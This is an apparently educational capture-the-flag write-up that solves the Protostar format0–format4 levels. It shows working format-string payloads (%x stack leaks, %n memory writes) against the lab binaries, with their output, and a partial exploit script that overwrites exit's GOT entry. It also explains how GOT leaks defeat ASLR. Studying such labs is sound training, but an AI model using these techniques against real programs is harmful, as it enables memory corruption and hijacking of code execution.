INTRO TO PWN: PROTOSTAR FORMAT STRINGS

Nithilan Pugal
Published in ZH3R0
May 14, 2020

Format string vulnerabilities are an extremely interesting class of vulnerabilities in their own right. Well then, how do they work??

int printf(const char *format, ...);

As you can see, printf takes a format string followed by a variable number of arguments. The conversion specifiers inside the format string dictate how each argument is interpreted, for example as a string or as a hexadecimal number.

If the attacker controls the format string, specifiers such as %x leak values from the stack. That is useful even when protections such as ASLR or stack canaries are in place, because the leaked values can reveal randomized addresses or the canary itself.

If you look at the man page for printf (man 3 printf) you will see various conversion specifiers such as %d for decimal numbers, %x for hexadecimal, %s for strings, etc. When they appear in the first argument of printf without matching arguments, printf reads whatever is on the stack where those arguments should be and prints it in the format you specify.

FORMAT0:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
volatile int target;
char buffer[64];

target = 0;

sprintf(buffer, string);

if(target == 0xdeadbeef) {
printf("you have hit the target correctly :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

Looking at this code we can immediately spot the vulnerability: sprintf uses our input as the format string and writes the result into buffer without any length check, so for plain text it behaves like strcpy. All we have to do is overflow the 64-byte buffer and overwrite target with 0xdeadbeef, written in little-endian byte order.

user@protostar:/opt/protostar/bin$ ./format0 "`python -c "print 'A'*64 + '\xef\xbe\xad\xde'"`"
you have hit the target correctly :)
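The byte order of that payload is worth spelling out. Here is a minimal sketch in Python 3 (the commands in this article use Python 2, which is what the Protostar VM ships) that builds the same bytes with struct. The names BUFFER_SIZE and TARGET_VALUE are chosen here for illustration, and the shorter "%64d" variant is an assumption that was not run in this article: it relies on sprintf expanding a width specifier into 64 characters.

```python
import struct

BUFFER_SIZE = 64            # size of `buffer` in vuln()
TARGET_VALUE = 0xdeadbeef   # value the check in vuln() compares against

# "<I" packs an unsigned 32-bit integer in little-endian order,
# which is how x86 stores it in memory.
packed = struct.pack("<I", TARGET_VALUE)

# Plain overflow: 64 filler bytes, then the value that lands in `target`.
payload = b"A" * BUFFER_SIZE + packed

# Assumed alternative (not taken from the run above): let sprintf
# generate the 64 filler characters itself via a field width.
short_payload = b"%64d" + packed

print(repr(packed))
print(len(payload), len(short_payload))
```

The second payload is only 8 bytes long, which matters when the input size is limited.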

We got Format0, and that was really easy!!! Now let us go to the next one.

FORMAT1:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
printf(string);

if(target) {
printf("you have modified the target :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

As you can see here, our input is passed as the first argument of printf, where the format string goes. Now lets type %x and see what happens.

user@protostar:/opt/protostar/bin$ ./format1 "%x %x %x %x %x %x"
804960c bffff7d8 8048469 b7fd8304 b7fd7ff4 bffff7d8user@protostar:/opt/protostar/bin$

As you can see we are printing things on the stack. If we keep increasing the number of %x we will keep printing things on the stack.

Now let us find the address of target:

user@protostar:/opt/protostar/bin$ objdump -t format1

format1:     file format elf32-i386

SYMBOL TABLE:
08048114 l d .interp 00000000 .interp
08048128 l d .note.ABI-tag 00000000 .note.ABI-tag
08048148 l d .note.gnu.build-id 00000000 .note.gnu.build-id
0804816c l d .hash 00000000 .hash
08048198 l d .gnu.hash 00000000 .gnu.hash
080481b8 l d .dynsym 00000000 .dynsym
08048218 l d .dynstr 00000000 .dynstr
0804826a l d .gnu.version 00000000 .gnu.version
08048278 l d .gnu.version_r 00000000 .gnu.version_r
08048298 l d .rel.dyn 00000000 .rel.dyn
080482a0 l d .rel.plt 00000000 .rel.plt
080482c0 l d .init 00000000 .init
080482f0 l d .plt 00000000 .plt
08048340 l d .text 00000000 .text
080484dc l d .fini 00000000 .fini
080484f8 l d .rodata 00000000 .rodata
08048520 l d .eh_frame 00000000 .eh_frame
08049524 l d .ctors 00000000 .ctors
0804952c l d .dtors 00000000 .dtors
08049534 l d .jcr 00000000 .jcr
08049538 l d .dynamic 00000000 .dynamic
08049608 l d .got 00000000 .got
0804960c l d .got.plt 00000000 .got.plt
08049628 l d .data 00000000 .data
08049630 l d .bss 00000000 .bss
00000000 l d .stab 00000000 .stab
00000000 l d .stabstr 00000000 .stabstr
00000000 l d .comment 00000000 .comment
00000000 l df *ABS* 00000000 crtstuff.c
08049524 l O .ctors 00000000 __CTOR_LIST__
0804952c l O .dtors 00000000 __DTOR_LIST__
08049534 l O .jcr 00000000 __JCR_LIST__
08048370 l F .text 00000000 __do_global_dtors_aux
08049630 l O .bss 00000001 completed.5982
08049634 l O .bss 00000004 dtor_idx.5984
080483d0 l F .text 00000000 frame_dummy
00000000 l df *ABS* 00000000 crtstuff.c
08049528 l O .ctors 00000000 __CTOR_END__
08048520 l O .eh_frame 00000000 __FRAME_END__
08049534 l O .jcr 00000000 __JCR_END__
080484b0 l F .text 00000000 __do_global_ctors_aux
00000000 l df *ABS* 00000000 format1.c
0804960c l O .got.plt 00000000 .hidden _GLOBAL_OFFSET_TABLE_
08049524 l .ctors 00000000 .hidden __init_array_end
08049524 l .ctors 00000000 .hidden __init_array_start
08049538 l O .dynamic 00000000 .hidden _DYNAMIC
08049628 w .data 00000000 data_start
08048440 g F .text 00000005 __libc_csu_fini
08048340 g F .text 00000000 _start
00000000 w *UND* 00000000 __gmon_start__
00000000 w *UND* 00000000 _Jv_RegisterClasses
080484f8 g O .rodata 00000004 _fp_hw
080484dc g F .fini 00000000 _fini
00000000 F *UND* 00000000 __libc_start_main@@GLIBC_2.0
080484fc g O .rodata 00000004 _IO_stdin_used
08049628 g .data 00000000 __data_start
0804962c g O .data 00000000 .hidden __dso_handle
08049530 g O .dtors 00000000 .hidden __DTOR_END__
08048450 g F .text 0000005a __libc_csu_init
00000000 F *UND* 00000000 printf@@GLIBC_2.0
08049630 g *ABS* 00000000 __bss_start
080483f4 g F .text 00000028 vuln
08049638 g O .bss 00000004 target
0804963c g *ABS* 00000000 _end
00000000 F *UND* 00000000 puts@@GLIBC_2.0
08049630 g *ABS* 00000000 _edata
080484aa g F .text 00000000 .hidden __i686.get_pc_thunk.bx
0804841c g F .text 0000001b main
080482c0 g F .init 00000000 _init

As we can see the address of the target variable is 0x08049638.

Now how does a variable work?? How do we write to target??

We use a conversion specifier called %n, which writes the number of characters printed so far to the address given by its argument, so it lets us write to memory. target is a global variable, so it lives at the fixed address we found via objdump rather than on the stack. For %n to write to it, that address has to be on the stack at the position where printf looks for the argument. Our input string itself is stored on the stack, so we can put the address there ourselves.
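To make the behaviour of %x and %n concrete, here is a toy model in Python 3. It is only a sketch under simplifying assumptions: toy_printf is a made-up function, it understands nothing but %x and %n, the "stack" is a plain list of words, and the address of target is simply placed as the third word instead of 130 words deep as in the real binary.

```python
import re

def toy_printf(fmt, stack, memory):
    """Toy model of printf handling only %x and %n on 32-bit words.

    fmt    -- format string (attacker controlled in these levels)
    stack  -- list of words sitting where printf expects its arguments
    memory -- dict of address -> value, standing in for process memory
    Returns the text that would be printed.
    """
    out = ""
    arg_index = 0
    pos = 0
    for spec in re.finditer(r"%([xn])", fmt):
        out += fmt[pos:spec.start()]   # copy literal text before the specifier
        word = stack[arg_index]        # every specifier consumes the next word
        arg_index += 1
        if spec.group(1) == "x":
            out += "%x" % word         # %x: print the word as hex
        else:
            memory[word] = len(out)    # %n: use the word as a pointer and
                                       # store the character count so far
        pos = spec.end()
    return out + fmt[pos:]

TARGET = 0x08049638                      # address of target from objdump
memory = {TARGET: 0}
stack = [0x804960c, 0xbffff7d8, TARGET]  # simplified stack layout
printed = toy_printf("%x %x %n", stack, memory)
print(repr(printed), memory[TARGET])
```

The two %x specifiers only exist to walk past the words in front of the address. The %n then lands on the address and target becomes nonzero, which is all format1 asks for.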

Now lets print the stack to see if we can find it:

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print '%x '*200"`"
804960c bffff588 8048469 b7fd8304 b7fd7ff4 bffff588 8048435 bffff758 b7ff1040 804845b b7fd7ff4 8048450 0 bffff608 b7eadc76 2 bffff634 bffff640 b7fe1848 bffff5f0 ffffffff b7ffeff4 804824d 1 bffff5f0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff608 204c744f a1f225f 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff634 8048450 8048440 b7ff1040 bffff62c b7fff8f8 2 bffff74e bffff758 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff72b 1f bffffff2 f bffff73b 0 0 0 3a000000 aaeedef9 3e986fd3 66b1abf0 697ff661 363836 0 0 0 2f2e0000 6d726f

Hmmmm, if we print far enough, values such as 25207825, 78252078 and 20782520 start repeating. Why?? Lets decode the hex values:

Decoded to ASCII they read %x %x %x. We have reached the part of the stack where our own input string is stored.
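The decoding can be checked with a few lines of Python 3. This is a small sketch that takes three of the repeating words from the dumps in this article and unpacks them in little-endian order, since that is how they sit in memory on x86.

```python
import struct

# Three consecutive words as printed by %x
words = [0x25207825, 0x78252078, 0x20782520]

# %x shows each word as a number, so the bytes appear reversed.
# Packing as little-endian restores the order they have in memory.
decoded = b"".join(struct.pack("<I", w) for w in words)

print(decoded)
```

The result is our own format string, which confirms that printf has walked all the way up the stack to the program arguments.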

What we can do is place the address of target in our input and then write to it using %n. Lets add markers around the address so that it is easier to find.

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08' +'BBBB'+'%x '*200"`"
AAAA8BBBB804960c bffff588 8048469 b7fd8304 b7fd7ff4 bffff588 8048435 bffff74c b7ff1040 804845b b7fd7ff4 8048450 0 bffff608 b7eadc76 2 bffff634 bffff640 b7fe1848 bffff5f0 ffffffff b7ffeff4 804824d 1 bffff5f0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff608 5237e6b9 7864b0a9 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff634 8048450 8048440 b7ff1040 bffff62c b7fff8f8 2 bffff742 bffff74c 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff72b 1f bffffff2 f bffff73b 0 0 0 ab000000 63f594da 3de356ee 69bf3870 697c9722 363836 2f2e0000 6d726f

Our address sits near the end of this dump. Now we have to land exactly on it so that we can write to it using %n.

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08' +'BBBB'+'%x '*140"`"
AAAA8BBBB804960c bffff638 8048469 b7fd8304 b7fd7ff4 bffff638 8048435 bffff800 b7ff1040 804845b b7fd7ff4 8048450 0 bffff6b8 b7eadc76 2 bffff6e4 bffff6f0 b7fe1848 bffff6a0 ffffffff b7ffeff4 804824d 1 bffff6a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6b8 87be168e adeae09e 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff6e4 8048450 8048440 b7ff1040 bffff6dc b7fff8f8 2 bffff7f6 bffff800 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7db 1f bffffff2 f bffff7eb 0 0 0 71000000 4b837673 33f8bc29 c8503f44 69727d41 363836 0 2f2e0000 6d726f66 317461 41414141 8049638 42424242 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825

We are getting closer

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08' +'BBBB'+'%x '*130"`"
AAAA8BBBB804960c bffff658 8048469 b7fd8304 b7fd7ff4 bffff658 8048435 bffff81e b7ff1040 804845b b7fd7ff4 8048450 0 bffff6d8 b7eadc76 2 bffff704 bffff710 b7fe1848 bffff6c0 ffffffff b7ffeff4 804824d 1 bffff6c0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6d8 b9c4d785 93906195 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff704 8048450 8048440 b7ff1040 bffff6fc b7fff8f8 2 bffff814 bffff81e 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7fb 1f bffffff2 f bffff80b 0 0 0 67000000 b5c5f25 697d2314 ce2ab275 69ecff4b 363836 0 6f662f2e 74616d72 41410031 96384141 42420804 78254242

In the last dump the address is split across two words (96384141 42420804), so we keep adjusting the padding and the number of %x until it is aligned:

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08'+'BBBBB'+'%x '*128+'%x '"`"
AAAA8BBBBB804960c bffff658 8048469 b7fd8304 b7fd7ff4 bffff658 8048435 bffff820 b7ff1040 804845b b7fd7ff4 8048450 0 bffff6d8 b7eadc76 2 bffff704 bffff710 b7fe1848 bffff6c0 ffffffff b7ffeff4 804824d 1 bffff6c0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6d8 a191ad2 204dacc2 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff704 8048450 8048440 b7ff1040 bffff6fc b7fff8f8 2 bffff816 bffff820 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7fb 1f bffffff2 f bffff80b 0 0 0 a8000000 ed37b423 7dd6fafa 260e960b 6915d863 363836 0 2f2e0000 6d726f66 317461 41414141 8049638

As you can see, my last %x prints the address of the target variable. If we now replace the last %x with %n, printf will write the number of characters printed so far to the address we provided, which is the target variable:

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08'+'BBBBB'+'%x '*128+'%n '"`"
AAAA8BBBBB804960c bffff658 8048469 b7fd8304 b7fd7ff4 bffff658 8048435 bffff820 b7ff1040 804845b b7fd7ff4 8048450 0 bffff6d8 b7eadc76 2 bffff704 bffff710 b7fe1848 bffff6c0 ffffffff b7ffeff4 804824d 1 bffff6c0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6d8 e4a5d3d 241eeb2d 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff704 8048450 8048440 b7ff1040 bffff6fc b7fff8f8 2 bffff816 bffff820 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7fb 1f bffffff2 f bffff80b 0 0 0 42000000 4eddec35 f02178d3 5cec85b3 69568ffe 363836 0 2f2e0000 6d726f66 317461 41414141 you have modified the target :)

YESSSSS! We have now modified the variable!!!

FORMAT2:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if(target == 64) {
printf("you have modified the target :)\n");
} else {
printf("target is %d :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

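Now lets take a look at this. This time the input comes from stdin via fgets into a 512-byte buffer on the stack, and target is again a global int, which must equal 64. Use objdump -t to find the address of target, which is 0x080496e4.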

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA'+'\xe4\x96\x04\x08'+'%x '*10" | ./format2  
AAAA�200 b7fd8420 bffff614 41414141 80496e4 25207825 78252078 20782520 25207825 78252078
target is 0 :(

lets aim for it and see what happens

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA'+'\xe4\x96\x04\x08'+'%x '*4+'%n '" | ./format2 
AAAA�200 b7fd8420 bffff614 41414141
target is 39 :(

Ok we got 39. %n writes the number of characters printed so far into the variable, so we have printed only 39 characters. We need to have printed exactly 64 characters by the time %n is reached so that it stores 64 in the target variable.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAAAAAAAAA0'+'\xe4\x96\x04\x08'+'%x'*6+'aaaaa%n'" | ./format2
AAAAAAAAAAA0�200b7fd8420bffff614414141414141414130414141aaaaa
you have modified the target :)

After a bit of work we hit the target!!!!!!! All this takes is a bit of intuition and trial and error.
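The trial and error can be replaced by counting. The following Python 3 sketch adds up what printf has emitted before it reaches %n for both attempts above. The helper printed_before_n is a hypothetical name, and the leaked words are copied from the two outputs shown in this section.

```python
ADDRESS = b"\xe4\x96\x04\x08"   # address of target, little-endian

def printed_before_n(prefix, leaked_words, separator, suffix=b""):
    """Number of bytes printf has emitted when it reaches %n."""
    leaked = b"".join(b"%x" % word + separator for word in leaked_words)
    return len(prefix) + len(leaked) + len(suffix)

# First attempt: 'AAAA' + address + '%x ' * 4 + '%n '
first = printed_before_n(
    b"AAAA" + ADDRESS,
    [0x200, 0xb7fd8420, 0xbffff614, 0x41414141],
    b" ",
)

# Second attempt: 'AAAAAAAAAAA0' + address + '%x' * 6 + 'aaaaa%n'
second = printed_before_n(
    b"AAAAAAAAAAA0" + ADDRESS,
    [0x200, 0xb7fd8420, 0xbffff614, 0x41414141, 0x41414141, 0x30414141],
    b"",
    b"aaaaa",
)

print(first, second)
```

The counts match the 39 reported by the program and the 64 that the check wants. Note that the longer prefix also moves the address from the 5th to the 7th argument, which is why the second payload needs six %x instead of four.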

FORMAT3:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
printf(string);
}

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);

printbuffer(buffer);

if(target == 0x01025544) {
printf("you have modified the target :)\n");
} else {
printf("target is %08x :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

Ok so now it looks like target must end up with the value 0x01025544.

OH SNAP!!! Well we better get started:

First use objdump -t to find the address of target which is 0x080496f4. So if we play around you may get something like this:

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%08x '*11+'%08x'" | ./format3
�00000000 bffff5d0 b7fd7ff4 00000000 00000000 bffff7d8 0804849d bffff5d0 00000200 b7fd8420 bffff614 080496f4
target is 00000000 :(

Ok we are getting there. The 8 in %08x is the minimum field width in characters and the 0 tells printf to pad with zeros, so every value is printed as 8 characters. This acts as our padding.

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%x '*11+'%08x'" | ./format3
�0 bffff5d0 b7fd7ff4 0 0 bffff7d8 804849d bffff5d0 200 b7fd8420 bffff614 080496f4
target is 00000000 :(

So we can fiddle around with this:

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%0757x '*11+'%08n'" | ./format3
...
...
target is 00002096 :(

Okay we are getting there

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%01539100x '*11+'%08n'" | ./format3
...
...
target is 01025543 :(

Well one more to go!!

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%01539100x '*11+'a%08n'" | ./format3
...
...
you have modified the target :)

YES!!!!!! We got it!!! If you are wondering what would happen if I took out the 0 from %08x: the output would be padded with spaces instead of zeros.
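The widths used above do not have to be found by fiddling. Here is a short Python 3 sketch of the arithmetic, assuming the same payload shape as in the commands: a 4-byte address, then eleven padded %x conversions each followed by one space, then %n. The constant names and count_for are made up for this example.

```python
TARGET_VALUE = 0x01025544
ADDRESS_BYTES = 4   # the packed address printed at the very start
CONVERSIONS = 11    # padded %x conversions in front of %n
SEPARATOR = 1       # the space after each %x

def count_for(width, extra=0):
    """Characters printed before %n for a given field width."""
    return ADDRESS_BYTES + CONVERSIONS * (width + SEPARATOR) + extra

# Work backwards from the value we want %n to store.
remaining = TARGET_VALUE - ADDRESS_BYTES
per_conversion, extra = divmod(remaining, CONVERSIONS)
width = per_conversion - SEPARATOR

print(hex(count_for(757)))   # the first experiment above
print(width, extra)          # width to use and leftover characters
```

The leftover of one character is exactly the single 'a' that had to be added in front of %n in the final command.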

FORMAT4:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
printf("code execution redirected! you win\n");
_exit(1);
}

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);

printf(buffer);

exit(1);
}

int main(int argc, char **argv)
{
vuln();
}

There is no 'target' to overwrite, and we cannot return into the function 'hello' either, because the program calls exit before vuln ever reaches ret. So how do we do it?!?!?

WE OVERWRITE THE GOT!!!

Many of you are taking gasps of air as you have no idea what this is but it sounds AWESOME!!! Now time to break your overbearing imagination:

~FORMAT 4 to be continued……

GOT & PLT:

Now lets first write a simple C program:

#include <stdio.h>
#include <stdlib.h>

int main() {
puts("Hello world");
puts("c00p4rklynn is my secret name");
exit(0);
return 0;
}

And we compile with gcc:

$ gcc random.c -o random

My C file uses 2 functions which I have not defined or written code for: puts and exit. Then how are they used??? These functions live in libc, a shared library that already contains their compiled code. gcc links the random binary dynamically against libc, so when the binary calls puts or exit, the code that runs is the one inside libc. Lets now analyze this in gdb:

$ gdb random
(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x10
0x080483fd <main+9>: mov DWORD PTR [esp],0x80484f0
0x08048404 <main+16>: call 0x804831c <puts@plt>
0x08048409 <main+21>: mov DWORD PTR [esp],0x80484fc
0x08048410 <main+28>: call 0x804831c <puts@plt>
0x08048415 <main+33>: mov DWORD PTR [esp],0x0
0x0804841c <main+40>: call 0x804832c <exit@plt>
End of assembler dump.

We can see that the puts is called at the address 0x804831c, lets disassemble that address and take a look at it:

(gdb) disassemble 0x804831c
Dump of assembler code for function puts@plt:
0x0804831c <puts@plt+0>: jmp DWORD PTR ds:0x804961c
0x08048322 <puts@plt+6>: push 0x10
0x08048327 <puts@plt+11>: jmp 0x80482ec
End of assembler dump.

WHAT?!?! We are jumping to an address?!?! Lets disassemble that address too.

Dump of assembler code for function _GLOBAL_OFFSET_TABLE_:
0x08049608 <_GLOBAL_OFFSET_TABLE_+0>: xor al,0x95
0x0804960a <_GLOBAL_OFFSET_TABLE_+2>: add al,0x8
0x0804960c <_GLOBAL_OFFSET_TABLE_+4>: add BYTE PTR [eax],al
0x0804960e <_GLOBAL_OFFSET_TABLE_+6>: add BYTE PTR [eax],al
0x08049610 <_GLOBAL_OFFSET_TABLE_+8>: add BYTE PTR [eax],al
0x08049612 <_GLOBAL_OFFSET_TABLE_+10>: add BYTE PTR [eax],al
0x08049614 <_GLOBAL_OFFSET_TABLE_+12>: add al,BYTE PTR [ebx-0x7cedf7fc]
0x0804961a <_GLOBAL_OFFSET_TABLE_+18>: add al,0x8
0x0804961c <_GLOBAL_OFFSET_TABLE_+20>: and al,BYTE PTR [ebx-0x7ccdf7fc]
0x08049622 <_GLOBAL_OFFSET_TABLE_+26>: add al,0x8
End of assembler dump.

GOT?!?! The disassembly above is meaningless because the GOT holds data, not instructions. Lets examine the memory instead:

x 0x804961c
0x804961c <_GLOBAL_OFFSET_TABLE_+20>: "\"\203\004\b2\203\004\b"

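Ohh, these bytes are the little-endian address 0x08048322, which is puts@plt+6, the instruction right after the jmp. puts has not been called yet, so the GOT entry still points back into the PLT. The first call goes through the dynamic linker, which then stores the real address of puts in libc here, and from then on the jump leads out of this binary into the external library.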
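gdb printed the GOT entry as a string with octal escapes, which is hard to read. A quick Python 3 sketch turns those bytes back into an address. The byte string is copied from the gdb output above, and 0x0804831c is the start of puts@plt from the earlier disassembly.

```python
import struct

# Bytes of the GOT entry exactly as gdb showed them: "\"\203\004\b"
raw = b"\"\203\004\b"

# Interpret the four bytes as one little-endian 32-bit address.
entry = struct.unpack("<I", raw)[0]

PUTS_PLT = 0x0804831c   # address of puts@plt from the disassembly
print(hex(entry), entry - PUTS_PLT)
```

The entry is six bytes past the start of puts@plt, which is the push instruction that follows the indirect jmp.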

So what we saw here was that the call first went to a small jump stub in the PLT (Procedure Linkage Table), which then jumped through the GOT (Global Offset Table). Once resolved, the GOT entry contains the address of an external function outside the binary, in this case the address of puts in libc.

When compiling a binary we do not know where exit or puts will end up in libc at run time. So the binary calls a location whose address it does know, the PLT stub, which jumps through the GOT. The GOT is a table holding the address of each function in libc and other dynamically linked libraries.

To be able to use external functions from a library, the dynamic linker has to write the real address of each function into the GOT.

An ELF binary is not just raw machine code. Before main executes, the loader and dynamic linker run first and do setup work such as mapping the shared libraries and preparing the PLT and GOT.

You can exploit this by overwriting a GOT entry so that a call to an external function jumps to a function of your choice instead. Also, in a binary like this one the GOT itself sits at a fixed address even if libc's address changes, so leaking a GOT entry gives you a libc address from which you can calculate the addresses of other libc functions, allowing you to exploit the binary via ROP or ret2libc.
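The idea of the indirection can be modelled in a few lines of Python 3. This is purely a conceptual sketch: the dictionary got stands in for the Global Offset Table, exit_plt for the PLT stub, and libc_exit and hello are stand-in functions invented here, not real library calls.

```python
def libc_exit(status):
    # Stand-in for the real exit() living in libc
    return "libc exit(%d)" % status

def hello(*_ignored):
    # Stand-in for the function we want to reach instead
    return "code execution redirected! you win"

# The GOT: one writable slot per imported function
got = {"exit": libc_exit}

def exit_plt(status):
    # The PLT stub never calls libc directly.
    # It jumps to whatever address the GOT slot currently holds.
    return got["exit"](status)

before = exit_plt(1)

# The attack: overwrite the slot, leave the calling code untouched
got["exit"] = hello
after = exit_plt(1)

print(before)
print(after)
```

The calling code is identical in both cases. Only the table entry changed, and that is the single write our format string has to perform.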

Now that you have a good understanding of what we are going to do, lets head back…

FORMAT 4 …. The Conclusion…

Now that we have an understanding of what we are about to do lets get started.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
printf("code execution redirected! you win\n");
_exit(1);
}

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);

printf(buffer);

exit(1);
}

int main(int argc, char **argv)
{
vuln();
}

Open a second Protostar session in /tmp, as this will make writing scripts easier. So lets find the GOT entry of exit and the address of hello.

(gdb) disassemble vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) disassemble 0x80483ec
Dump of assembler code for function exit@plt:
0x080483ec <exit@plt+0>: jmp DWORD PTR ds:0x8049724
0x080483f2 <exit@plt+6>: push 0x30
0x080483f7 <exit@plt+11>: jmp 0x804837c
End of assembler dump.
(gdb) x 0x8049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2

The GOT entry for exit is at 0x08049724, and it currently holds 0x080483f2 (exit@plt+6) because exit has not been resolved yet. Now hello is:

(gdb) x hello
0x80484b4 <hello>: 0x83e58955

The address of hello is 0x80484b4. Now lets start writing a script

import struct

HELLO = 0x80484b4
EXIT = 0x08049724

# Pad the input to 512 bytes, the size of the buffer
def padding(s):
    return s + ('X' * (512 - len(s)))

exploit = ""
exploit += "AAAABBBBCCCC"  # markers to find where our input sits on the stack
exploit += "%x " * 10
print padding(exploit)

Now lets execute it:

user@protostar:/opt/protostar/bin$ python /tmp/exp.py | ./format4
